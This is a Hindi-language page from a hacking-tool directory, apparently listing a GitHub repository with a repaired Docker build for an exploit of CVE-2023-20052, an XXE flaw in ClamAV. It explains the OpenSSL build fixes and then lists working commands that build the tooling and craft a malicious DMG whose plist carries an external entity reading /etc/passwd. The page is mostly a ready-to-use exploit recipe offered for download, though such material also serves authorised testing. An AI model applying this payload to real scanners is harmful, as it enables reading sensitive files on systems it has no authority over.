Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-20052 | Kitploit
उपकरण/GitHubGitHub/mohitsinghpapola/cve-2023-20052
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगमालवेयर विश्लेषणबाइनरी विश्लेषण
GitHubmohitsinghpapola/cve-2023-20052

CVE-2023-20052

रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-20052 एक्सप्लॉइट - सुधारित बिल्ड

CVE-2023-20052 (ClamAV XXE भेद्यता) के लिए सुधारित Docker बिल्ड जो वास्तव में कंपाइल होता है।

क्या टूटा था

मूल एक्सप्लॉइट आधुनिक सिस्टम पर बिल्ड नहीं हो पाता:

  • ❌ OpenSSL 3.0 संगतता त्रुटियाँ
  • ❌ HMAC_CTX struct अपूर्ण प्रकार त्रुटियाँ
  • ❌ अंतर्निहित फ़ंक्शन घोषणा त्रुटियाँ
  • ❌ dmg/filevault.c के कंपाइलेशन पर बिल्ड विफल होता है

मैंने क्या ठीक किया

  1. आधार इमेज बदली: Ubuntu 22.04 → Ubuntu 18.04
  2. OpenSSL संस्करण ठीक किया: libssl1.0-dev (OpenSSL 1.0) का उपयोग करता है
  3. नॉन-इंटरैक्टिव मोड जोड़ा: बिल्ड प्रॉम्प्ट को रोकता है
  4. कार्यशील Dockerfile: वास्तव में सफलतापूर्वक कंपाइल होता है

यह क्यों काम करता है

libdmg-hfsplus अप्रचलित OpenSSL 1.0 फ़ंक्शंस का उपयोग करता है:

  • HMAC_CTX_init() / HMAC_CTX_cleanup() (OpenSSL 1.1+ में हटा दिए गए)
  • सीधे HMAC_CTX struct उपयोग (OpenSSL 1.1+ में अपारदर्शी)

Ubuntu 18.04 OpenSSL 1.0 समर्थन वाला अंतिम LTS है।

बिल्ड और उपयोग

root@kitploit:~
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .

# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash

# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg

श्रेय

  • मूल एक्सप्लॉइट: nokn0wthing/CVE-2023-20052
  • ठीक किया: https://reapsec.com
root@kitploit:~
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus
टूल डाउनलोड करें